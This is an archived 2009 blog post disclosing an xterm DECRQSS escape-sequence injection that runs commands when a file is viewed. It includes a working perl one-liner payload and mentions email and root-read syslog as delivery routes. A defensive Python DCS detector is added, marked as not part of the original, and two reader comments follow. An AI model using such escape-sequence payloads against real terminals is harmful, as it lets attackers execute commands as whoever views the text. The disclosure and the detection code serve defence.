Wednesday, January 14, 2009

Huge XTERM vulnerability.

Hi folks, today I found, just around the corner, a huge XTerm code injection.
When xterm receives a DECRQSS (Device Control Request Status String, "DCS $ q")
request, it simply echoes invalid commands back in its response.

Exploitability is the same as for the "window title reporting" issue
in DSA-380: include the DCS string in an email message to the victim,
or arrange to have it in syslog to be viewed by root.

So for example:
perl -e 'print "\eP\$q\nnetstat\n\e\\"' > bla.log
cat bla.log
would run the "netstat" command.
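
A defensive check for the scenario above, as an added example that is not part of the original post: it scans a file's bytes for DCS strings (flagging DECRQSS ones that begin with "$q") and renders control bytes visibly before anything reaches the terminal. The function names and the sample log bytes are constructed for illustration.

```python
import re

# DCS introducer: 7-bit "ESC P" or the raw 8-bit C1 byte 0x90.
# String terminator (ST): 7-bit "ESC \" or the raw 8-bit C1 byte 0x9c.
# An unterminated DCS (runs to end of data) is reported as well.
DCS_RE = re.compile(rb"(?:\x1bP|\x90)(.*?)(?:\x1b\\|\x9c|\Z)", re.DOTALL)

def find_dcs(data: bytes):
    """Return (offset, is_decrqss, payload) for each DCS string in data."""
    hits = []
    for m in DCS_RE.finditer(data):
        payload = m.group(1)
        # DECRQSS payloads start with "$q".
        hits.append((m.start(), payload.startswith(b"$q"), payload))
    return hits

def neutralize(data: bytes) -> bytes:
    """Escape every byte except tab, newline and printable ASCII.

    Conservative by design: non-ASCII text is escaped too, so no ESC or
    C1 control byte can reach the terminal.
    """
    out = bytearray()
    for b in data:
        if b in (0x09, 0x0A) or 0x20 <= b < 0x7F:
            out.append(b)
        else:
            out += b"\\x%02x" % b
    return bytes(out)

# Constructed sample: two ordinary log lines around one DECRQSS string
# whose command text is a placeholder.
LINE1 = b"Jan 14 10:00:01 host sshd[1]: session opened\n"
SAMPLE = (LINE1
          + b"\x1bP$q\nPLACEHOLDER\n\x1b\\"
          + b"Jan 14 10:00:02 host sshd[1]: session closed\n")

if __name__ == "__main__":
    for offset, is_decrqss, payload in find_dcs(SAMPLE):
        kind = "DECRQSS" if is_decrqss else "DCS"
        print(f"{kind} string at byte {offset}: {payload!r}")
    print(neutralize(SAMPLE).decode("ascii"), end="")
```

Viewing the output of neutralize() instead of the raw file is similar in spirit to reading untrusted logs with `cat -v` or a pager rather than plain `cat`.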


Anonymous said...

Thanks a lot for publishing this vulnerability, Marco. I just removed xterm and installed xfce-terminal instead, to safely cat.

Marco Ramilli said...

Thank you for reading my blog!
